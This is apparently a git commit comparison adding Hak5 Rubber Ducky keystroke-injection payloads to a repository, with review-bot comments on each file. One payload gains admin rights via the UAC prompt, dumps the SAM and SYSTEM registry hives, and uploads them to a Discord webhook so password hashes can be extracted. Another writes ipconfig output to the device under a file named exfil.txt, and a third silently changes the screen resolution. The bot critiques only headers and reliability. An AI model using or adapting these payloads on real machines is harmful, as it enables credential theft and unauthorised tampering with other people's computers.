Compare commits
10 Commits
29ca18d648
...
39b4b43c7b
Author | SHA1 | Date |
---|---|---|
Mavis Coffey | 39b4b43c7b | |
Peaks | 675972662a | |
Luu | 0df3011601 | |
Luu | a81ecd3e64 | |
Luu | c898ed7858 | |
Luu | 15f8f25701 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd |
|
@ -0,0 +1,21 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING Powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
|
||||
ENTER
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
REM And should the attacker want to make sure the payload was successful:
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
ATTACKMODE STORAGE
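Review bot: The REM Description understates what is collected: `ipconfig` with no arguments writes the configuration of every adapter (addresses, masks, gateways, DNS suffix), not only "the current IP". The header should say so, e.g. `REM Description: Writes the full ipconfig output of the host to exfil.txt on the device's storage`. The output path is hard-coded to `D:\`, so on a host where D: is some other volume the file is presumably created on the host's own disk and left there; the header should state that assumption and name the file, so it can be found and removed after a lab run. "Hack5" in the disclaimer line is presumably meant to be "Hak5".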
|
|
@ -0,0 +1,28 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||
|
||||
## Description
|
||||
|
||||
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord webhook URL
|
||||
* Ensure the webhook permissions are configured
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 3000
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||
DELAY 500
|
||||
GUI d
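Review bot: This payload has no REM header, unlike the other payload files in this compare, and nothing in it documents its footprint. The `reg save` line writes `sam` and `system` hive copies to the elevated shell's working directory, nothing visible removes them, and both are posted to a third-party webhook. A header such as `REM Target: Windows, local administrator required (the LEFTARROW/ENTER pair appears to accept the UAC prompt)` and `REM Artifacts: sam and system hive copies remain on the host; contents are sent to the configured webhook` would make that explicit for anyone reviewing the file or running it in a lab. Separately, the PASSIVE_WINDOWS_DETECT extension sets `$_OS`, but the keystrokes below it are not guarded by it, so they appear to be typed on any host. Wrapping them in `IF ($_OS == WINDOWS) THEN` … `END_IF` would use the result.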
|
|
@ -0,0 +1,59 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRING display
|
||||
ENTER
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
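Review bot: The `REPEAT 8 TAB` and `REPEAT 12 TAB` counts navigate the Settings page blind. On a Windows build, display scaling or UI language where the Display page is laid out differently, the following `ENTER` and arrow keys would presumably act on a different control and change an unrelated setting. The header should name what it was tested on, e.g. `REM TARGET Windows 10/11 (tested on <BUILD_PLACEHOLDER>, English UI)`. The restore half runs only after `WAIT_FOR_CAPS_CHANGE`, so removing the device earlier leaves the host at the changed resolution, which the DESCRIPTION should mention. The outer `WHILE ($CAPS_STATE == $_CAPSLOCK_ON)` never reassigns `$CAPS_STATE` and seems to serve only as a run-once wrapper; a short REM saying so, plus indentation of the nested loop bodies, would make the control flow readable.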
|